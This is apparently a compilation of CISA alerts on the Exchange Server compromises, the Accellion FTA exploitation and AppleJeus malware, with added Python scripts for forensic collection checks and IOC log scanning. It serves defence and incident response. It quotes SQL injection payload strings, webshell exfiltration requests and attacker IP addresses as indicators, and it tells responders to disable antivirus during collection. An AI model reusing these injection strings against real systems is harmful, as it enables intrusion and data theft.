3) Select Path and Filenames. On the window that appears, use the "Browse" button to identify the destination of the memory capture. Save the memory capture to an external device and not the main hard drive of the system, so that the saved file does not overwrite any unallocated space on the system. Name the destination file with a descriptive name (e.g., the hostname of the system). Select the box "Include pagefile" and provide a name for the pagefile that is descriptive of the system. Do not select "Create AD1 file."

Figure 2: FTK Imager – Memory Capture

4) Capture Memory. Click on "Capture Memory" to begin the capture process.
The process will take several minutes depending on the size of the pagefile and the amount of memory on the system.

Figure 3: FTK Imager – Capture Process

KAPE Collection Procedure [1]

1) Download KAPE from https://www.kroll.com/en/services/cyber-risk/investigate-and-respond/kroll-artifact-parser-extractor-kape.
2) Disable any antivirus or host protection mechanisms that prevent execution from removable media, or data loss prevention (DLP) mechanisms that restrict use of removable media. Re-enable antivirus and host protection once this process is completed.
3) Unzip Kape.zip and run gkape.exe as administrator from your removable media.
4) Target source should be the drive on which the OS resides, typically C:.
5) Target destination should be a folder on an external drive, not the same drive as the Target source. If available, use an external hard drive or flash drive. A KAPE execution with these parameters will typically produce output artifacts with a total size of 1-25 GB. If you are going to run KAPE on different machines and want to save to the same drive, ensure the Target destination folder is unique for each execution of KAPE.
6) Uncheck the Flush checkbox (it is checked by default).
7) Check the Add %d and Add %m checkboxes.
8) Select ALL checkboxes to ensure KAPE will target all available data that it is capable of targeting. This takes some time; use the down arrow and space bar to move through the list quickly.
9) Check the Process VSCs checkbox.
10) Select the Zip radio button and add the base name TargetOutput.
11) Ensure the Deduplicate checkbox is checked (it is checked by default).
At the bottom you should now see a large Current command line, similar to:

    .\kape.exe --tsource C: --tdest E:\%d%m --tflush --target !BasicCollection,!SANS_Triage,Avast,AviraAVLogs,Bitdefender,ComboFix,ESET,FSecure,HitmanPro,Malwarebytes,McAfee,McAfee_ePO,RogueKiller,SentinelOne,Sophos,SUPERAntiSpyware,Symantec_AV_Logs,TrendMicro,VIPRE,Webroot,WindowsDefender,Ammyy,AsperaConnect,BoxDrive,CiscoJabber,CloudStorage,ConfluenceLogs,Discord,Dropbox,Exchange,ExchangeClientAccess,ExchangeTransport,FileZilla,GoogleDrive,iTunesBackup,JavaWebCache,Kaseya,LogMeIn,Notepad++,OneDrive,OutlookPSTOST,ScreenConnect,Skype,TeamViewerLogs,TeraCopy,VNCLogs,Chrome,ChromeExtensions,Edge,Firefox,InternetExplorer,WebBrowsers,ApacheAccessLog,IISLogFiles,ManageEngineLogs,MSSQLErrorLog,NGINXLogs,PowerShellConsole,KapeTriage,MiniTimelineCollection,RemoteAdmin,VirtualDisks,Gigatribe,TorrentClients,Torrents,$Boot,$J,$LogFile,$MFT,$SDS,$T,Amcache,ApplicationEvents,BCD,CombinedLogs,EncapsulationLogging,EventLogs,EventLogs-RDP,EventTraceLogs,EvidenceOfExecution,FileSystem,GroupPolicy,LinuxOnWindowsProfileFiles,LnkFilesAndJumpLists,LogFiles,MemoryFiles,MOF,OfficeAutosave,OfficeDocumentCache,Prefetch,RDPCache,RDPLogs,RecentFileCache,Recycle,RecycleBin,RecycleBinContent,RecycleBinMetadata,RegistryHives,RegistryHivesSystem,RegistryHivesUser,ScheduledTasks,SDB,SignatureCatalog,SRUM,StartupInfo,Syscache,ThumbCache,USBDevicesLogs,WBEM,WER,WindowsFirewall,WindowsIndexSearch,WindowsNotifcationsDB,WindowsTimeline,XPRestorePoints --vss --zip TargetOutput --gui

In the bottom right corner hit the Execute! button. Figure 4 shows gkape.exe during execution; you will also see a command window execute. Note: KAPE usually takes less than 20 minutes to complete on a workstation; if it is taking significantly longer there may be an issue.
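Before pressing Execute!, the command line gkape builds can be checked mechanically against steps 4-11. The following is an added example (not part of KAPE and not CISA's procedure): it parses the command line gkape shows and flags a destination on the same drive as the source, a missing %d/%m, a missing --vss or --zip TargetOutput, and --tflush left on. Note that --tflush deletes the contents of the destination folder before collection, which is why step 6 says to uncheck Flush, and note also that the command line shown above still carries --tflush, so the check would flag it. The two sample command lines are constructed; the option names are the real KAPE ones that appear in the command line above.

```python
# Added example (not part of KAPE or of this CISA alert): a pre-flight check of
# the "Current command line" that gkape.exe shows, against steps 4-11 of the
# collection procedure. Sample command lines below are constructed.

def parse_kape_cmdline(cmd):
    """Split a KAPE command line into {option: value}; value-less flags map to True."""
    tokens = cmd.split()
    opts = {}
    i = 1  # tokens[0] is kape.exe itself
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--"):
            name = tok[2:]
            has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("--")
            opts[name] = tokens[i + 1] if has_value else True
            i += 2 if has_value else 1
        else:
            i += 1  # stray token: ignore
    return opts


def drive_of(path):
    """Return the Windows drive letter ('C:') of a path, or '' if it has none."""
    return path[:2].upper() if len(path) >= 2 and path[1] == ":" else ""


def check_kape_cmdline(cmd):
    """Return a list of deviations from the procedure; an empty list means it conforms."""
    o = parse_kape_cmdline(cmd)

    def val(name):
        v = o.get(name)
        return v if isinstance(v, str) else ""

    tsource, tdest = val("tsource"), val("tdest")
    problems = []
    if not tsource or not tdest:
        problems.append("--tsource and --tdest are both required (steps 4-5)")
    elif drive_of(tsource) == drive_of(tdest):
        problems.append("tdest is on the same drive as tsource (step 5: write to an external drive)")
    if "%d" not in tdest or "%m" not in tdest:
        problems.append("tdest lacks %d/%m (step 7: Add %d and Add %m)")
    if o.get("tflush"):
        problems.append("--tflush present: Flush should be unchecked (step 6); it empties tdest before collecting")
    if not o.get("vss"):
        problems.append("--vss missing: Process VSCs should be checked (step 9)")
    if val("zip") != "TargetOutput":
        problems.append("--zip TargetOutput missing (step 10)")
    if not val("target"):
        problems.append("--target list is empty (step 8)")
    return problems


# Constructed sample command lines (target list abridged).
CONFORMING_CMD = r".\kape.exe --tsource C: --tdest E:\%d%m --target !BasicCollection,!SANS_Triage --vss --zip TargetOutput --gui"
RISKY_CMD = r".\kape.exe --tsource C: --tdest C:\kape\out --tflush --target !SANS_Triage --zip Out --gui"

if __name__ == "__main__":
    for cmd in (CONFORMING_CMD, RISKY_CMD):
        print(cmd)
        for p in check_kape_cmdline(cmd) or ["conforms to the procedure"]:
            print("  -", p)
```

Paste the command line from gkape's Current command line box into check_kape_cmdline; the drive comparison is what catches the common mistake of collecting to the drive being imaged.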
Figure 4: gkape.exe screenshot

Mitigations

CISA strongly recommends organizations read Microsoft’s advisory and security blog post for more information on how to look for this malicious activity and to apply critical patches as soon as possible.

(Updated March 4, 2021): CISA is aware of threat actors using open source tools to search for vulnerable Microsoft Exchange Servers. This particular type of attack is scriptable, allowing attackers to easily exploit vulnerabilities through automated mechanisms. CISA advises all entities to patch as soon as possible to avoid being compromised.

(Updated March 4, 2021): From Microsoft's patch release, the security updates are available for the following operating systems:
- Exchange Server 2010 (update requires SP 3 or any SP 3 RU – this is a Defense in Depth update)
- Exchange Server 2013 (update requires CU 23)
- Exchange Server 2016 (update requires CU 19 or CU 18)
- Exchange Server 2019 (update requires CU 8 or CU 7)

(Updated March 4, 2021): If you are running an older CU than the patch will accept, you must upgrade to at least the required CU as stated above, then apply the patch.

(Updated March 4, 2021): All patches must be applied using administrator privileges.

(Updated March 5, 2021): If patching is not an immediate option, CISA strongly recommends following the alternative mitigations found in Microsoft’s blog on Exchange Server Vulnerabilities Mitigations. However, these options should only be used as a temporary solution, not a replacement for patching. Additionally, there are other mitigation options available. CISA recommends limiting or blocking external access to internet-facing Exchange Servers via the following:
- Restrict untrusted connections to port 443, or set up a VPN to separate the Exchange Server from external access; note that this will not prevent an adversary from exploiting the vulnerability if the attacker is already in your network.
- Block external access to on-premises Exchange:
    - Restrict external access to the OWA URL: /owa/.
    - Restrict external access to the Exchange Admin Center (EAC), aka Exchange Control Panel (ECP), URL: /ecp/.
- (Updated March 4, 2021): Disconnect vulnerable Exchange servers from the internet until a patch can be applied.

CISA would like to thank Microsoft and Volexity for their contributions to this Alert.

Resources

(Updated April 14, 2021) Microsoft's April 2021 Security Update that mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019.

(Updated March 12, 2021) Check my OWA tool for checking if a system has been affected. Disclaimer: this tool does not check against an exhaustive list of compromised domains. It is meant for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information and cannot assure its accuracy or completeness; therefore, entities should not rely solely on this information to justify foregoing CISA’s recommendations for action described on this webpage.
Microsoft Advisory: https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/
Microsoft Security Blog - Hafnium targeting Exchange Servers: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
Volexity Blog: https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
Microsoft’s blog on Exchange Server Vulnerabilities Mitigations: https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/

References

[1] Eric Zimmerman: KAPE Documentation
Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities
Supplemental Direction V1 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities
Supplemental Direction V2 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities

Revisions

March 3, 2021: Initial Version
March 4, 2020: Updated Mitigations and Technical Details sections
March 5, 2021: Updated Mitigations Guidance from Microsoft
March 10, 2021: Updated TTP Section
March 12, 2021: Updated Resources Section
March 12, 2021: Added information on DearCry Ransomware
March 13, 2021: Added seven China Chopper Webshell MARs
March 14, 2021: Updated information on DearCry Ransomware
March 16, 2021: Added information on EOMT tool
March 25, 2021: Added two China Chopper Webshell MARs
March 25, 2021: Updated MARs to include YARA Rules
March 31, 2021: Added links to ED 21-02 and ED 21-02 Supplemental Direction
April 12, 2021: Added one China Chopper Webshell MAR and one DearCry Ransomware MAR
April 13, 2021: Added links to Microsoft's April 2021 Security Update and ED 21-02 Supplemental Direction V2
April 14, 2021: Added Exchange Server 2013 to the list of on-premises Exchange Servers affected by the vulnerabilities disclosed on April 13, 2021.
This product is provided subject to this Notification and this Privacy & Use policy.
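The mitigations above say to restrict external access to the /owa/ and /ecp/ paths. A way to confirm that the restriction is actually in effect is to read the IIS logs on the Exchange server (the same IISLogFiles target that the KAPE command line collects) and list requests to those paths from client addresses outside your internal ranges. The following is an added example and is not CISA's or Microsoft's tooling: the IIS W3C log lines, the internal address ranges in INTERNAL_NETS and the external client addresses are constructed assumptions; the parser reads the column names from the #Fields: header, so real logs with more columns work unchanged.

```python
# Added example, not CISA's or Microsoft's tooling: confirm from IIS W3C logs
# that external requests to /owa/ and /ecp/ are no longer reaching Exchange.
# Log lines and internal ranges are constructed; adjust INTERNAL_NETS to your
# own address plan.
import ipaddress

# Constructed IIS W3C extended log excerpt (fields abridged).
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2021-03-04 10:15:01 10.0.0.5 GET /owa/auth/logon.aspx - 10.0.1.25 200
2021-03-04 10:15:07 10.0.0.5 GET /ecp/ - 203.0.113.40 200
2021-03-04 10:15:09 10.0.0.5 POST /owa/auth.owa - 198.51.100.7 302
2021-03-04 10:15:11 10.0.0.5 GET /ecp/default.aspx - 192.168.4.9 200
2021-03-04 10:15:14 10.0.0.5 GET /EWS/Exchange.asmx - 203.0.113.41 401
"""

RESTRICTED_PREFIXES = ("/owa/", "/ecp/")
# Assumed internal ranges: RFC 1918 plus loopback and link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def parse_w3c(text):
    """Yield one dict per record, naming columns from the '#Fields:' header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed record: skip rather than misalign columns
        yield dict(zip(fields, values))


def is_external(ip_text, internal=INTERNAL_NETS):
    """True when the client address is outside every internal range (or unparsable)."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return True  # flag garbage addresses for review rather than drop them
    return not any(ip in net for net in internal)


def external_hits(text, prefixes=RESTRICTED_PREFIXES):
    """(client ip, uri stem, status) for every external request to a restricted path."""
    hits = []
    for rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "")
        if stem.lower().startswith(prefixes) and is_external(rec.get("c-ip", "")):
            hits.append((rec["c-ip"], stem, rec.get("sc-status", "")))
    return hits


if __name__ == "__main__":
    for ip, stem, status in external_hits(SAMPLE_IIS_LOG):
        print(f"external client {ip} reached {stem} (status {status})")
```

Run it over the logs from the period after the restriction was applied: any row in the output means the control is not in front of that path. If the server sits behind a load balancer, the c-ip column will be the balancer's address unless X-Forwarded-For logging is enabled, so check which column carries the real client first.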

  • AA21-055A: Exploitation of Accellion File Transfer Appliance
    by CISA on 24 February 2021 at 2:00 pm

    Original release date: February 24, 2021 | Last revised: February 25, 2021

    Summary

    This joint advisory is the result of a collaborative effort by the cybersecurity authorities of Australia,[1] New Zealand,[2] Singapore,[3] the United Kingdom,[4] and the United States.[5][6] These authorities are aware of cyber actors exploiting vulnerabilities in Accellion File Transfer Appliance (FTA).[7] This activity has impacted organizations globally, including those in Australia, New Zealand, Singapore, the United Kingdom, and the United States. Worldwide, actors have exploited the vulnerabilities to attack multiple federal and state, local, tribal, and territorial (SLTT) government organizations as well as private industry organizations including those in the medical, legal, telecommunications, finance, and energy sectors. According to Accellion, this activity involves attackers leveraging four vulnerabilities to target FTA customers.[8] In one incident, an attack on an SLTT organization potentially included the breach of confidential organizational data. In some instances observed, the attacker has subsequently extorted money from victim organizations to prevent public release of information exfiltrated from the Accellion appliance.

    This Joint Cybersecurity Advisory provides indicators of compromise (IOCs) and recommended mitigations for this malicious activity. For a downloadable copy of IOCs, see: AA21-055A.stix and MAR-10325064-1.v1.stix. Click here for a PDF version of this report.

    Technical Details

    Accellion FTA is a file transfer application that is used to share files. In mid-December 2020, Accellion was made aware of a zero-day vulnerability in Accellion FTA and released a patch on December 23, 2020. Since then, Accellion has identified cyber actors targeting FTA customers by leveraging the following additional vulnerabilities.
    - CVE-2021-27101 – Structured Query Language (SQL) injection via a crafted HOST header (affects FTA 9_12_370 and earlier)
    - CVE-2021-27102 – Operating system command execution via a local web service call (affects FTA versions 9_12_411 and earlier)
    - CVE-2021-27103 – Server-side request forgery via a crafted POST request (affects FTA 9_12_411 and earlier)
    - CVE-2021-27104 – Operating system command execution via a crafted POST request (affects FTA 9_12_370 and earlier)

    One of the exploited vulnerabilities (CVE-2021-27101) is an SQL injection vulnerability that allows an unauthenticated user to run remote commands on targeted devices. Actors have exploited this vulnerability to deploy a webshell on compromised systems. The webshell is located on the target system in the file /home/httpd/html/about.html or /home/seos/courier/about.html. The webshell allows the attacker to send commands to targeted devices, exfiltrate data, and clean up logs. The clean-up functionality of the webshell helps evade detection and analysis during post-incident response.

    The Apache /var/opt/cache/rewrite.log file may also contain the following evidence of compromise:

        [.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html
        [.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html
        ['))union(select(loc_id)from(net1.servers)where(proximity)=(0))] (1) pass through /courier/document_root.html

    These entries are followed shortly by a pass-through request to sftp_account_edit.php. The entries are the SQL injection attempt, indicating an attempt at exploitation of the HTTP header parameter HTTP_HOST.
    Apache access logging shows successful file listings and file exfiltration:

        “GET /courier/about.html?aid=1000 HTTP/1.1” 200 {Response size}
        “GET /courier/about.htmldwn={Encrypted Path}&fn={encrypted file name} HTTP/1.1” 200 {Response size}

    When the clean-up function is run, it modifies the archived Apache access logs /var/opt/apache/c1s1-access_log.*.gz and replaces the file contents with the following string:

        Binary file (standard input) matches

    In two incidents, the Cybersecurity and Infrastructure Security Agency (CISA) observed a large amount of data transferred over port 443 from federal agency IP addresses to 194.88.104[.]24. In one incident, the Cyber Security Agency of Singapore observed multiple TCP sessions with IP address 45.135.229[.]179.

    Organizations are encouraged to investigate the IOCs outlined in this advisory and in AR21-055A. If an Accellion FTA appears compromised, organizations can get an indication of the exfiltrated files by obtaining a list of file-last-accessed events for the target files of the symlinks located in the /home/seos/apps/1000/ folder over the period of malicious activity. This information is only indicative and may not be a comprehensive identifier of all exfiltrated files.

    Mitigations

    Organizations with Accellion FTA should:
    - Temporarily isolate or block internet access to and from systems hosting the software.
    - Assess the system for evidence of malicious activity including the IOCs, and obtain a snapshot or forensic disk image of the system for subsequent investigation.
    - If malicious activity is identified, obtain a snapshot or forensic disk image of the system for subsequent investigation, then:
        - Consider conducting an audit of Accellion FTA user accounts for any unauthorized changes, and consider resetting user passwords.
        - Reset any security tokens on the system, including the “W1” encryption token, which may have been exposed through SQL injection.
        - Update Accellion FTA to version FTA_9_12_432 or later.
        - Evaluate potential solutions for migration to a supported file-sharing platform after completing appropriate testing. Accellion has announced that FTA will reach end-of-life (EOL) on April 30, 2021.[9] Replacing software and firmware/hardware before it reaches EOL significantly reduces risks and costs.

    Additional general best practices include:
    - Deploying automated software update tools to ensure that third-party software on all systems is running the most recent security updates provided by the software vendor.
    - Only using up-to-date and trusted third-party components for the software developed by the organization.
    - Adding additional security controls to prevent access from unauthenticated sources.

    Resources
    - FireEye Blog – Cyber Criminals Exploit Accellion FTA for Data Theft and Extortion: https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html
    - Center for Internet Security (CIS) Critical Security Controls for Effective Cyber Defense, known as "CIS Controls": https://www.cisecurity.org/controls/ https://www.cisecurity.org/ms-isac/
    - Australia, Canada, New Zealand, the United Kingdom, and the United States Joint Advisory on Technical Approaches to Uncovering and Remediating Malicious Activity: https://us-cert.cisa.gov/ncas/alerts/aa20-245a
    - CISA and MS-ISAC’s Ransomware Guide: https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf

    References
    [1] Australian Cyber Security Centre (ACSC)
    [2] New Zealand National Cyber Security Centre (NZ NCSC)
    [3] Singapore Cyber Security Agency (CSA)
    [4] United Kingdom National Cyber Security Centre (UK NCSC)
    [5] United States Cybersecurity and Infrastructure Security Agency (CISA)
    [6] United States Multi-State Information Sharing and Analysis Center (MS-ISAC)
    [7] Accellion Press Release: Update to Recent FTA Security Incident
    [8] Accellion Press Release: Update to Recent FTA Security Incident
    [9] Accellion Announcement: End-of-Life for Legacy FTA Software

    Revisions
    February 24, 2021: Initial Version

    This product is provided subject to this Notification and this Privacy & Use policy.
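The log-based IOCs in the advisory above (the rewrite.log injection entries, the about.html listing and download requests with a 200 response, the wiped archived access logs and the two IP addresses) can be applied to an FTA's logs with a few regular expressions. The following is an added example and is not part of the advisory or of Accellion's tooling. The rewrite.log sample reproduces the advisory's entries and adds a constructed follow-on request to sftp_account_edit.php; the access-log and flow-record samples are constructed with documentation-range client addresses; the IOC addresses are the advisory's two, written without the "[.]" defanging so that they match real log text.

```python
# Added example, not part of AA21-055A and not Accellion's tooling: apply the
# advisory's log-based IOCs to FTA Apache logs. Sample log lines are
# constructed (the rewrite.log lines reproduce the advisory's examples).
import re

SAMPLE_REWRITE_LOG = """\
[.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html
[.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html
[fta.example.internal] (1) pass through /courier/sftp_account_edit.php
[fta.example.internal] (1) pass through /courier/web/1000@/wmLogin.html
"""

SAMPLE_ACCESS_LOG = """\
198.51.100.23 - - [20/Jan/2021:02:14:07 +0000] "GET /courier/about.html?aid=1000 HTTP/1.1" 200 5123
198.51.100.23 - - [20/Jan/2021:02:14:22 +0000] "GET /courier/about.html?dwn=ENCPATH&fn=ENCNAME HTTP/1.1" 200 918233
10.20.30.40 - - [20/Jan/2021:02:15:00 +0000] "GET /courier/web/1000@/wmLogin.html HTTP/1.1" 200 2311
198.51.100.23 - - [20/Jan/2021:02:16:10 +0000] "GET /courier/about.html?aid=1000 HTTP/1.1" 404 312
"""

# Constructed flow record: an internal host sending to one of the advisory's IOC addresses.
SAMPLE_FLOW = "2021-01-20T02:14:22Z 10.20.30.40:52113 -> 194.88.104.24:443 TCP bytes=73000000"

# HOST-header injection as it appears in /var/opt/cache/rewrite.log.
SQLI_RE = re.compile(r"union\(select\(.*\)from\((t_global|net1\.servers)\)", re.IGNORECASE)
# Webshell file listing (aid=1000) or download (dwn=) through about.html, answered 200.
WEBSHELL_RE = re.compile(r'"GET /courier/about\.html\S*?(?:aid=1000|dwn=)[^"]*HTTP/1\.[01]" 200')
WIPE_MARKER = b"Binary file (standard input) matches"
IOC_IPS = {"194.88.104.24", "45.135.229.179"}  # advisory IOCs, undefanged
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def scan_rewrite_log(text):
    """(line no, tag, line) for injection entries and the account-edit request that follows them."""
    findings, sqli_seen = [], False
    for n, line in enumerate(text.splitlines(), 1):
        if SQLI_RE.search(line):
            sqli_seen = True
            findings.append((n, "sqli_host_header", line))
        elif sqli_seen and "sftp_account_edit.php" in line:
            findings.append((n, "post_sqli_account_edit", line))
    return findings


def scan_access_log(text):
    """Access-log lines with the advisory's listing/exfiltration request shape and a 200 response."""
    return [(n, "webshell_request", line)
            for n, line in enumerate(text.splitlines(), 1) if WEBSHELL_RE.search(line)]


def archived_log_wiped(raw):
    """True if a c1s1-access_log.*.gz file holds the clean-up marker instead of gzip data.
    Pass the raw bytes of the .gz file: after the wipe it is no longer a gzip stream."""
    return raw.strip() == WIPE_MARKER


def ioc_ips_in(text):
    """Advisory IOC addresses present in arbitrary text (flow, firewall or proxy logs)."""
    return sorted({ip for ip in IPV4_RE.findall(text) if ip in IOC_IPS})


if __name__ == "__main__":
    for finding in scan_rewrite_log(SAMPLE_REWRITE_LOG) + scan_access_log(SAMPLE_ACCESS_LOG):
        print(finding)
    print("IOC addresses in flow record:", ioc_ips_in(SAMPLE_FLOW))
```

Because the webshell's clean-up routine rewrites the archived access logs, an empty scan_access_log result is not reassuring on its own: run archived_log_wiped over every c1s1-access_log.*.gz file as well, and treat a wiped archive as a finding in itself. The one-week window in the advisory's mitigations (file-last-accessed events under /home/seos/apps/1000/) is the place to look next for what was taken.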

  • AA21-048A: AppleJeus: Analysis of North Korea’s Cryptocurrency Malware
    by CISA on 17 February 2021 at 4:00 pm

    Original release date: February 17, 2021 | Last revised: April 15, 2021

    Summary

    This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

    This joint advisory is the result of analytic efforts among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Treasury (Treasury) to highlight the cyber threat to cryptocurrency posed by North Korea, formally known as the Democratic People’s Republic of Korea (DPRK), and provide mitigation recommendations. Working with U.S. government partners, FBI, CISA, and Treasury assess that Lazarus Group—which these agencies attribute to North Korean state-sponsored advanced persistent threat (APT) actors—is targeting individuals and companies, including cryptocurrency exchanges and financial service companies, through the dissemination of cryptocurrency trading applications that have been modified to include malware that facilitates theft of cryptocurrency. These cyber actors have targeted organizations for cryptocurrency theft in over 30 countries during the past year alone. It is likely that these actors view modified cryptocurrency trading applications as a means to circumvent international sanctions on North Korea—the applications enable them to gain entry into companies that conduct cryptocurrency transactions and steal cryptocurrency from victim accounts.

    As highlighted in FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks and Guidance on the North Korean Cyber Threat, North Korea’s state-sponsored cyber actors are targeting cryptocurrency exchanges and accounts to steal and launder hundreds of millions of dollars in cryptocurrency.[1][2][3] The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.
    For more information on HIDDEN COBRA activity, visit https://www.us-cert.cisa.gov/northkorea.

    The U.S. Government has identified malware and indicators of compromise (IOCs) used by the North Korean government to facilitate cryptocurrency thefts; the cybersecurity community refers to this activity as “AppleJeus.” This report catalogues AppleJeus malware in detail. North Korea has used AppleJeus malware posing as cryptocurrency trading platforms since at least 2018. In most instances, the malicious application—seen on both Windows and Mac operating systems—appears to be from a legitimate cryptocurrency trading company, thus fooling individuals into downloading it as a third-party application from a website that seems legitimate. In addition to infecting victims through legitimate-looking websites, HIDDEN COBRA actors also use phishing, social networking, and social engineering techniques to lure users into downloading the malware.

    Refer to the following Malware Analysis Reports (MARs) for full technical details of AppleJeus malware and associated IOCs.
    - MAR-10322463-1.v1: AppleJeus – Celas Trade Pro
    - MAR-10322463-2.v1: AppleJeus – JMT Trading
    - MAR-10322463-3.v1: AppleJeus – Union Crypto
    - MAR-10322463-4.v1: AppleJeus – Kupay Wallet
    - MAR-10322463-5.v1: AppleJeus – CoinGoTrade
    - MAR-10322463-6.v1: AppleJeus – Dorusio
    - MAR-10322463-7.v1: AppleJeus – Ants2Whale

    Click here for a PDF version of this report.

    Technical Details

    The North Korean government has used multiple versions of AppleJeus since the malware was initially discovered in 2018. This section outlines seven of the versions below. The MARs listed above provide further technical details of these versions.
    Initially, HIDDEN COBRA actors used websites that appeared to host legitimate cryptocurrency trading platforms to infect victims with AppleJeus; however, these actors are now also using other initial infection vectors, such as phishing, social networking, and social engineering techniques, to get users to download the malware.

    Targeted Nations

    HIDDEN COBRA actors have targeted institutions with AppleJeus malware in several sectors, including energy, finance, government, industry, technology, and telecommunications. Since January 2020, the threat actors have targeted these sectors in the following countries: Argentina, Australia, Belgium, Brazil, Canada, China, Denmark, Estonia, Germany, Hong Kong, Hungary, India, Ireland, Israel, Italy, Japan, Luxembourg, Malta, the Netherlands, New Zealand, Poland, Russia, Saudi Arabia, Singapore, Slovenia, South Korea, Spain, Sweden, Turkey, the United Kingdom, Ukraine, and the United States (figure 1).

    Figure 1: Countries targeted with AppleJeus by HIDDEN COBRA threat actors since 2020

    AppleJeus Versions

    Note: The version numbers used for headings in this document correspond to the order in which the AppleJeus campaigns were identified in open source or through other investigative means. These versions may or may not be in the order in which the AppleJeus campaigns were developed or deployed.

    AppleJeus Version 1: Celas Trade Pro

    Introduction and Infrastructure

    In August 2018, open-source reporting disclosed information about a trojanized version of a legitimate cryptocurrency trading application on an undisclosed victim’s computer. The malicious program, known as Celas Trade Pro, was a modified version of the benign Q.T. Bitcoin Trader application. This incident led to the victim company being infected with a Remote Administration Tool (RAT) known as FALLCHILL, which was attributed to North Korea (HIDDEN COBRA) by the U.S. Government.
    FALLCHILL is a fully functional RAT with multiple commands that the adversary can issue from a command and control (C2) server to infected systems via various proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware (Develop Capabilities: Malware [T1587.001]). Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.[4]

    Further research revealed that a phishing email from a Celas LLC company (Phishing: Spearphishing Link [T1566.002]) recommended the trojanized cryptocurrency trading application to victims. The email provided a link to the Celas’ website, celasllc[.]com (Acquire Infrastructure: Domain [T1583.001]), where the victim could download a Windows or macOS version of the trojanized application.

    The celasllc[.]com domain resolved to the following Internet Protocol (IP) addresses from May 29, 2018, to January 23, 2021.
    - 45.199.63[.]220
    - 107.187.66[.]103
    - 145.249.106[.]19
    - 175.29.32[.]160
    - 185.142.236[.]213
    - 185.181.104[.]82
    - 198.251.83[.]27
    - 208.91.197[.]46
    - 209.99.64[.]18

    The celasllc[.]com domain had a valid Sectigo (previously known as Comodo) Secure Sockets Layer (SSL) certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak security verification level that does not require validation of the owner’s identity or the actual business’s existence.

    Celas Trade Pro Application Analysis

    Windows Program

    The Windows version of the malicious Celas Trade Pro application is an MSI Installer (.msi). The MSI Installer installation package comprises a software component and an application programming interface (API) that Microsoft uses for the installation, maintenance, and removal of software. The installer looks legitimate and is signed by a valid Sectigo certificate that was purchased by the same user as the SSL certificate for celasllc[.]com (Obtain Capabilities: Code Signing Certificates [T1588.003]).
    The MSI Installer asks the victim for administrative privileges to run (User Execution: Malicious File [T1204.002]). Once permission is granted, the threat actor is able to run the program with elevated privileges (Abuse Elevation Control Mechanism [T1548]) and the MSI executes the following actions.
    - Installs CelasTradePro.exe in folder C:\Program Files (x86)\CelasTradePro
    - Installs Updater.exe in folder C:\Program Files (x86)\CelasTradePro
    - Runs Updater.exe with the CheckUpdate parameters

    The CelasTradePro.exe program asks for the user’s exchange and loads a legitimate-looking cryptocurrency trading platform—very similar to the benign Q.T. Bitcoin Trader—that exhibits no signs of malicious activity.

    The Updater.exe program has the same program icon as CelasTradePro.exe. When run, it checks for the CheckUpdate parameter, collects the victim’s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR encryption, and sends the information to a C2 website (Exfiltration Over C2 Channel [T1041]).

    macOS X Program

    The macOS version of the malicious application is a DMG Installer, a disk image format that Apple commonly uses to distribute software over the internet. The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). It has very similar functionality to the Windows version. The installer executes the following actions.
    - Installs CelasTradePro in folder /Applications/CelasTradePro.app/Contents/MacOS/
    - Installs Updater in folder /Applications/CelasTradePro.app/Contents/MacOS
    - Executes a postinstall script
    - Moves .com.celastradepro.plist to folder LaunchDaemons
    - Runs Updater with the CheckUpdate parameter

    CelasTradePro asks for the user’s exchange and loads a legitimate-looking cryptocurrency trading platform—very similar to the benign Q.T. Bitcoin Trader—that exhibits no signs of malicious activity.
